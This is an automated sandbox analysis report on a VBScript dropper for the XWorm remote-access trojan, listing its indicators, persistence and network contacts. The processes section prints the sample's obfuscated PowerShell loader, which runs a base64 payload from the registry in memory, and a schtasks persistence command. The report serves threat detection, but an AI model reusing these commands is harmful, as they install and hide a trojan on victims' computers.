Malware Analysis Report

2024-11-16 13:30

Sample ID 240621-y54pda1cqb
Target FUD.vbs
SHA256 0e260957b3b6a07c65e0681f5dd2fc641b68f1f5616a0561f196ac083f747d33
Tags
xworm execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0e260957b3b6a07c65e0681f5dd2fc641b68f1f5616a0561f196ac083f747d33

Threat Level: Known bad

The file FUD.vbs was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan

Detect Xworm Payload

Xworm

Drops startup file

Executes dropped EXE

Adds Run key to start application

Looks up external IP address via web service

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-21 20:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-21 20:23

Reported

2024-06-21 20:25

Platform

win11-20240419-en

Max time kernel

54s

Max time network

55s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anti root.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anti root.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Windows backup N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows backup = "C:\\Users\\Admin\\Windows backup" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Windows backup N/A
N/A N/A C:\Users\Admin\Windows backup N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Windows backup N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anti root.vbs'; $RO87DB = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $RO87DB = -join $RO87DB[-1..-$RO87DB.Length];[<##>AppDomain<##>]::<##>('cFS1BEYurrentDomain'.replace('cFS1BEY','C'))<##>.<##>('l1OK0AYoad'.replace('l1OK0AY','L'))([Convert]::FromBase64String($RO87DB))<##>.<##>('e655ZBQntryPoint'.replace('e655ZBQ','E'))<##>.<##>('InvGKQU22oke'.replace('vGKQU22','v'))($Null,$Null)<##>;

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows backup" /tr "C:\Users\Admin\Windows backup"

C:\Users\Admin\Windows backup

"C:\Users\Admin\Windows backup"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 Jamalhacker-53065.portmap.io udp

Files

memory/3452-0-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_havxajsy.4ee.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3452-1-0x000001B469270000-0x000001B469292000-memory.dmp

memory/3452-10-0x000001B469980000-0x000001B4699C6000-memory.dmp

memory/3452-12-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/3452-11-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/3452-13-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/3452-15-0x000001B4692B0000-0x000001B4692C0000-memory.dmp

memory/3452-20-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/3452-21-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

C:\Users\Admin\Windows backup

MD5 0e9ccd796e251916133392539572a374
SHA1 eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256 c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512 e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 e566632d8956997225be604d026c9b39
SHA1 94a9aade75fffc63ed71404b630eca41d3ce130e
SHA256 b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512 f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd